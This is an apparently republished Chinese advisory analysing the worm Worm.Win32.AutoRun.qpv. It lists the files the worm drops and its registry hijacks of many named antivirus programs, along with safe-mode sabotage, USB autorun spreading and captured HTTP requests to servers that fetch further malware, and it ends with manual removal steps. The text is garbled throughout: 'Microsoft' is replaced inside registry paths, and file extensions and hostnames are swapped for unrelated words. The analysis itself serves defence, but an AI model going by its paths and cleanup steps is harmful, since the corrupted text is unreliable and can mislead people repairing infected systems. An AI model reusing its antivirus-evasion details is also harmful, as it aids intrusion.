必威电竞|足球世界杯竞猜平台

Worm.Win32.AutoRun.qpv
來源:互聯(lián)網(wǎng)

Worm.Win32.AutoRun.qpv,該病毒是蠕蟲,病毒的圖標為windows自動更新程序,誘騙用戶點擊運行。病毒運行后,隱藏自身,破壞系統(tǒng)正常SFC功能,更改系統(tǒng)文件操作權(quán)限、刪除系統(tǒng)文件、并用病毒文件替換正常的系統(tǒng)更新程序。

病毒標簽

病毒名稱: Worm.Win32.AutoRun.qpv

病毒類型:蠕蟲

文件 MD5: 3166743046C030B5E597E5FAE755C33F

公開范圍:完全公開

危害等級: 4

文件長度: 20,560 字節(jié)

感染系統(tǒng): Windows 98以上版本

開發(fā)工具: Microsoft Visual C++ 6.0

病毒描述

病毒遍歷進程列表,搜索并結(jié)束對其自身存在構(gòu)成威脅的進程,隱藏打開Internet Explorer,通過遠程寫入在IE進程中創(chuàng)建病毒線程。病毒修改注冊表啟動項,達到開機自啟動的目的、添加映像劫持項,使眾多安全工具無法啟動。病毒在各磁盤分區(qū)創(chuàng)建autorun.inf文件和病毒副本文件way.pif文件,達到自啟動和U盤傳播的目的。病毒檢測當前鼠標位置的窗口是否含有對病毒有危險的信息,當出現(xiàn)病毒認為威脅它存在的信息是關(guān)閉此窗口。病毒連接網(wǎng)絡(luò)更新自身,下載并運行大量其他病毒。

行為分析

本地行為

1、文件運行后生成以下文件

病毒替換的文件:

%system32%\dllcache\wuauclt.exe 20,560 字節(jié)

%System32%\wuauclt.exe 20,560 字節(jié)

病毒衍生的文件:

%System32%\dmdskmgrs.dll 594,432 字節(jié)

%DriveLetter%\WAY.PIF 20,560 字節(jié)

%DriveLetter%\AUTORUN.INF 147 字節(jié)

%HomeDrive%\WAY.PIF 20,560 字節(jié)

%HomeDrive%\AUTORUN.INF 147 字節(jié)

系統(tǒng)原文件備份:

%DriveLetter%\tEM.tep 108,032 字節(jié)

2、修改注冊表

添加注冊表項目:

[HKLM\Software\微軟\Windows NT\CurrentVersion\Image File Execution Options]

項:360rpt.EXE

值:c:\windows\system32\dllcache\wuauclt.exe

描述:映像劫持。

[HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

項:360safe.EXE

值:c:\windows\system32\dllcache\wuauclt.exe

描述:映像劫持。

注:被映像劫持的程序有"360Safe.exe"、"360tray.exe"、"360rpt.EXE"、"Runiep.exe"、"RAv.exe"、"RSTray.exe"、"CCenter.EXE"、"RAVMON.EXE"、"RAVMOND.EXE"、"GuardField.exe"、"Ravxp.exe"、"GFUpd.exe"、"kmailmon.exe"、"kavstart.exe"、"KAVPFW.EXE"、"kwatch.exe"、"sharedaccess"、"McShield"、"KWhatchsvc"、"KPfwSvc"、"Symantec AntiVirus"、"Symantec AntiVirus Drivers Services"、"Symantec AntiVirus Definition Watcher"、"Norton AntiVirus Server"、"UpdaterUI.exe"、"rfwsrv.exe"、"rfwProxy.exe"、"rfwstub.exe"、"RavStub.exe"、"rfwmain.exe"、"rfwmain.exe"、"TBMon.exe"、"nod32kui.exe"、"nod32krn.exe"、"KASARP.exe"、"FrameworkService.exe"、"scan32.exe"、"VPC32.exe"、"VPTRAY.exe"、"AntiArp.exe"、"KRegEx.exe"、"KvXP.kxp"、"kvsrvxp.kxp"、"kvsrvxp.exe"、"KVWSC.EXE"、"Iparmor.exe"、"Avp.EXE"、"VsTskMgr.exe"、"EsuSafeguard.exe",在此不贅述。

[HKLM\SOFTWARE\微軟\Windows\CurrentVersion\Policies\Explorer\Run]

項:internetnet

值:c:\windows\system32\wuauclt.exe

描述:自啟動項

刪除注冊表項目:

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\

{4D36E967-E325-11CE-BFC1-08002BE10318}\@]

鍵值: 字符串: "DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\

{4D36E967-E325-11CE-BFC1-08002BE10318}\@]

鍵值: 字符串: "DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\

{4D36E967-E325-11CE-BFC1-08002BE10318}\@]

鍵值: 字符串: "DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\

{4D36E967-E325-11CE-BFC1-08002BE10318}\@]

鍵值: 字符串: "DiskDrive"

描述:禁止進入安全模式,進入安全模式藍屏。

3、破壞系統(tǒng)正常的SFC功能,更改系統(tǒng)文件操作權(quán)限。

病毒通過加載系統(tǒng)動態(tài)鏈接庫sfc_os.dll,調(diào)用當中的函數(shù),利用這些函數(shù)修改系統(tǒng)的文件合法性檢測,使其在用病毒文件替換系統(tǒng)文件時windows不會提示系統(tǒng)文件被更改。

病毒通過通過cacls.exe命令更改以下文件訪問控制權(quán):

"c:\windows\system32\packet.dll"

"c:\windows\system32\pthreadVC.dll"

"c:\windows\system32\wpcap.dll"

"c:\windows\system32\drivers\npf.sys"

"c:\windows\system32\npptools.dll "

"c:\windows\system32\drivers\acpidisk.sys"

"c:\windows\system32\wanpacket.dll"

更改為對所有用戶為完全控制。

注:SFC(系統(tǒng)文件檢查器,這個工具在WIN3.X時代開始集成于微軟操作系統(tǒng),并正式出現(xiàn)在Windows 98下,它可以掃描所有受保護的系統(tǒng)文件驗證系統(tǒng)文件完整性并用正確的微軟程序版本替換不正確的版本)

4、病毒企圖躲避卡巴斯基的主動防御功能

病毒用更改系統(tǒng)時間和替換系統(tǒng)驅(qū)動躲避卡巴斯基的主動防御。

病毒通過加載其釋放的驅(qū)動程序beep.sys(替換系統(tǒng)中原有的文件)來重置系統(tǒng)的ssdt來關(guān)閉卡巴的主動防御。

5、遍歷進程列表結(jié)束進程

病毒遍歷系統(tǒng)進程列表當發(fā)現(xiàn)以下進程是結(jié)束該進程。

"360Safe.exe"、"360tray.exe"、"360rpt.EXE"、"Runiep.exe"、"RAv.exe"、"RSTray.exe"、

"CCenter.EXE"、"RAVMON.EXE"、"RAVMOND.EXE"、"GuardField.exe"、"Ravxp.exe"、"GFUpd.exe"、

"kmailmon.exe"、"kavstart.exe"、"KAVPFW.EXE"、"kwatch.exe"、"sharedaccess"、"McShield"、

"KWhatchsvc"、"KPfwSvc"、"Symantec AntiVirus"、"Symantec AntiVirus Drivers Services"、

"Symantec AntiVirus Definition Watcher"、"Norton AntiVirus Server"、"UpdaterUI.exe"、

"rfwsrv.exe"、"rfwProxy.exe"、"rfwstub.exe"、"RavStub.exe"、"rfwmain.exe"、"rfwmain.exe"、

"TBMon.exe"、"nod32kui.exe"、"nod32krn.exe"、"KASARP.exe"、"FrameworkService.exe"、"scan32.exe"、

"VPC32.exe"、"VPTRAY.exe"、"AntiArp.exe"、"KRegEx.exe"、"KvXP.kxp"、"kvsrvxp.kxp"、"kvsrvxp.exe"、

"KVWSC.EXE"、"Iparmor.exe"、"Avp.EXE"、"VsTskMgr.exe"、"EsuSafeguard.exe"

這些其中包含各大殺毒軟件的進程和系統(tǒng)自動更新進程。

6、在各盤符創(chuàng)建autorun.inf文件和病毒副本

病毒在各磁盤分區(qū)下創(chuàng)建autorun.inf文件和病毒副本文件,將autorun.inf中的打開命令和File Explorer命令指向為該磁盤分區(qū)的病毒副本文件。從而使用戶打開磁盤分區(qū)時附帶運行該病毒文件。還可以達到U盤傳播的目的。

7、獲得窗口句柄結(jié)束窗口

病毒利用api函數(shù)獲取當前鼠標所在位置,獲得該位置窗口句柄。若發(fā)現(xiàn)該窗口題欄文本中含有以下字符串,關(guān)閉該窗口。

"衛(wèi)士"、"殺"、"NOD32"、"process"、"BD"、"瑞星"、"木馬"、"綠鷹"、"點"、"邁克菲"、"檢"、"Firewall"、"病毒"、"antiy"、"民"、"worm"、"SREng"、"清理"。

8、病毒循環(huán)檢測

病毒通過一個死循環(huán)不斷的執(zhí)行5,6兩個步驟。當發(fā)現(xiàn)病毒文件被刪除時就會重新創(chuàng)建該文件。

網(wǎng)絡(luò)行為

1、病毒連接網(wǎng)絡(luò)地址:

x.c***.com

update.heis****.cn

update.cpus****.com

CSC3-2004-crl.veri****.com

皇室戰(zhàn)爭職業(yè)聯(lián)賽verisigncom

2、下載并運行大量其他病毒。

2.exe not-a-病毒:AdWare.Win32.Cinmus.vmz

9.exe Trojan-GameThief.Win32.OnLineGames.tptg

1.exe Trojan-Downloader.Win32.Zlob.abgq

6.exe Trojan.Win32.Pakes.ljf

x.gif Worm.Win32.AutoRun.rjz

5.exe Trojan-Downloader.Win32.Agent.aksm

xx.exe 原病毒程序更新文件

3.exe Trojan-Downloader.Win32.Delf.epw

10.exe 網(wǎng)站排名工具條(廣告件)

3、下載的病毒運行時的衍生文件

%system32%\drivers\npf.sys

%System32%\dllcache\wuauclt.exe

%System32%\dllcache\npptools.dll

%System32%\OLDE.tmp

%System32%\dmdskmgrs.dll

%System32%\htxvimes.dll

%System32%\lsa佩德羅·努內(nèi)斯exe

%System32%\WanPacket.dll

%System32%\Packet.dll

%system32%\wpcap.dll

%System32%\wacclt.exe

%System32%\wuauclt.exe

%System32%\npptools.dll

%System32%\mprmsgse.axz

%System32%\dkmdskmgrs.dll

%Windir%\Kler\pbhealth.dll

%Windir%\LastGood\system32\npptools.dll

%HomeDrive%\Documents and Settings\All Users\「開始」菜單\程序\啟動\3.pif

桌面\A.PIF

%HomeDrive%\Documents and Settings\2.pif

%HomeDrive%\Documents and Settings\3.光合誘導(dǎo)素

%HomeDrive%\Documents and Settings\6.pif

%HomeDrive%\Documents and Settings\9.pif

%HomeDrive%\Documents and Settings\10.pif

%ProgramFiles%\Common Files\PushWare\Uninst.exe

%ProgramFiles%\Common Files\PushWare\cpush.dll

%ProgramFiles%\eff.pif

%ProgramFiles%\zzToolBar\IP.dat

%ProgramFiles%\zzToolBar\SearchEngineConfig

%ProgramFiles%\zzToolBar\Uninstall.exe

%ProgramFiles%\zzToolBar\uISGRLFile.dat

%ProgramFiles%\zzToolBar\ToolBand.dll

%ProgramFiles%\zzToolBar\Toolbar_bho.dll

%HomeDrive%\tEM.tep

注:由于此文件為病毒更新程序產(chǎn)生,此時system32目錄下的wuauclt.exe已經(jīng)是病毒,所以這個備份也是病毒。

%HomeDrive%\h.光合誘導(dǎo)素

%HomeDrive%\tttMMtep

%HomeDrive%\HVVP.PIF

4、病毒更新所發(fā)數(shù)據(jù)包

a.

GET /adsys/rankstat.HTML?Install_stat&AgentID=-33554375&Uid=00000000000000000001$$00-0C-29-9D-6E-C3&Auth=D97A0C6F8EA1ED38 HTTP/1.1

User-Agent: ProxyDown

Host: update.heishatu.cn

Cache-Control: no-cache

HTTP/1.0 200 OK

Content-Length: 21

Content-Type: text/HTML

Last-Modified: Wed, 23 May 2007 03:37:12 GMT

Accept-Ranges: bytes

ETag: "a24084a6eb9cc71:711"

X-Powered-By: ASP.NET

Server: 微軟-IIS/4.0

Date: Tue, 28 Oct 2008 02:12:33 GMT

X-Cache: MISS from localhost

Connection: close

ok

b.

GET /cpush/version.txt HTTP/1.1

User-Agent: CPUSH_UPDATER

Host: update.cpushpop.com

Cache-Control: no-cache

HTTP/1.0 200 OK

Date: Tue, 28 Oct 2008 02:12:33 GMT

Server: apache/2.2.2 (fedora)

Last-Modified: Tue, 21 Oct 2008 12:02:22 GMT

ETag: "f100b7-6d-34404f80"

Accept-Ranges: bytes

Content-Length: 109

Content-Type: text/plain; charset=UTF-8

X-Cache: MISS from localhost

Connection: close

[common]

version=1,1,0,9

url=http://update.cpus****.com/cpush/cpush.dll

md5=7e3d08311b3c954197b4f05f044491c0

c.

GET /cpush/version.txt?version=1,1,0,9&uid=5EAF7213-7BE1-48D2-8C99-0020F68BF3FC HTTP/1.1

User-Agent: CPUSH_UPDATER

Host: update.cpushpop.com

Cache-Control: no-cache

HTTP/1.0 200 OK

Date: Tue, 28 Oct 2008 02:12:33 GMT

Server: apache/2.2.2 (fedora)

Last-Modified: Tue, 21 Oct 2008 12:02:22 GMT

ETag: "f100b7-6d-34404f80"

Accept-Ranges: bytes

Content-Length: 109

Content-Type: text/plain; charset=UTF-8

X-Cache: MISS from localhost

Connection: close

[common]

version=1,1,0,9

url=http://update.cpus****.com/cpush/cpush.dll

md5=7e3d08311b3c954197b4f05f044491c0

病毒簡要流程如圖:

注:%system32%是一個可變路徑。病毒通過查詢操作系統(tǒng)來決定當前System文件夾的位置。Windows 2000/NT中默認的安裝路徑是C:\Winnt\System32,windows95/98/me中默認的安裝路徑是C:\Windows\System,Windows XP中默認的安裝路徑是C:\Windows\System32。

%Temp% = C:\Documents and Settings\AAAAA\Local Settings\Temp 當前用戶TEMP緩存變量

%Windir%\ WINDODWS所在目錄

%DriveLetter%\ 邏輯驅(qū)動器根目錄

%ProgramFiles%\ 系統(tǒng)程序默認安裝目錄

%HomeDrive% = C:\ 當前啟動的系統(tǒng)的所在分區(qū)

%Documents and Settings%\ 當前用戶文檔根目錄

清除方案

1、使用安天防線可徹底清除此病毒(推薦)。

2、手工清除請按照行為分析刪除對應(yīng)文件,恢復(fù)相關(guān)系統(tǒng)設(shè)置。

(1) 用atool結(jié)束所有IE進程。

(2) 用Atool強制刪除以下所有文件:

病毒原文件

%system32%\dllcache\wuauclt.exe

%System32%\wuauclt.exe

%System32%\dmdskmgrs.dll

%DriveLetter%\WAY.光合誘導(dǎo)素

%DriveLetter%\AUTORUN.INF

%HomeDrive%\WAY.PIF %HomeDrive%\AUTORUN.INF

%HomeDrive%\tEM.tep

%System32%\drivers\npf.sys

%system32%\dllcache\wuauclt.exe

%System32%\dllcache\npptools.dll

%System32%\OLDE.tmp

%System32%\dmdskmgrs.dll

%System32%\htxvimes.dll

%System32%\lsaes.exe

%System32%\WanPacket.dll

%System32%\Packet.dll

%system32%\wpcap.dll

%System32%\wacclt.exe

%System32%\wuauclt.exe

%System32%\npptools.dll

%System32%\mprmsgse.axz

%System32%\dkmdskmgrs.dll

%Windir%\Kler\pbhealth.dll

%Windir%\LastGood\system32\npptools.dll

%HomeDrive%\Documents and Settings\All Users\「開始」菜單\程序\啟動\3.pif

桌面\A.PIF

%HomeDrive%\Documents and Settings\2.光合誘導(dǎo)素

%HomeDrive%\Documents and Settings\3.pif

%HomeDrive%\Documents and Settings\6.pif

%HomeDrive%\Documents and Settings\9.pif

%HomeDrive%\Documents and Settings\10.pif

%ProgramFiles%\Common Files\PushWare\Uninst.exe

%ProgramFiles%\Common Files\PushWare\cpush.dll

%ProgramFiles%\eff.pif

%ProgramFiles%\zzToolBar\IP.dat

%ProgramFiles%\zzToolBar\SearchEngineConfig

%ProgramFiles%\zzToolBar\Uninstall.exe

%ProgramFiles%\zzToolBar\uISGRLFile.dat

%ProgramFiles%\zzToolBar\ToolBand.dll

%ProgramFiles%\zzToolBar\Toolbar_bho.dll

%HomeDrive%\h.光合誘導(dǎo)素

%HomeDrive%\tttmm.tep

%HomeDrive%\HVVP.PIF

(3) 刪除注冊表中病毒添加的項

a. 將%Windir%\regedit.exe更改名稱為**.exe。

b. 刪除注冊表下列各項

[HKLM\Software\微軟\Windows NT\CurrentVersion\Image File Execution Options]主鍵。

[KLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]

項:internetnet

值:c:\windows\system32\wuauclt.exe

[HKLM\Software\微軟\Windows\CurrentVersion\Explorer\Browser Helper Objects ]

項:CAdLogic Object

值:c:\program files\common files\pushware\cpush0.dll

[HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects ]

項:Info cache

值:c:\windows\kler\pbhealth.dll

[HKLM\Software\微軟\Windows\CurrentVersion\Explorer\Browser Helper Objects ]

項:網(wǎng)站排名工具條BHO網(wǎng)站排名工具條

值:c:\program files\zztoolbar\toolbar_bho.dll

[HKLM\Software\Microsoft\Internet Explorer\Toolbar]

項:toolband.dll

值: c:\program files\zztoolbar\toolband.dll

c. 添加下列注冊表

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\@]

鍵值: 字符串: "DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\@]

鍵值: 字符串: "DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\@]

鍵值: 字符串: "DiskDrive"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\@]

鍵值: 字符串: "DiskDrive"

(4) 恢復(fù)原系統(tǒng)文件

從干凈的系統(tǒng)中拷貝以下文件:

%system32%\dllcache\wuauclt.exe

%System32%\wuauclt.exe

參考資料 >

生活家百科家居網(wǎng)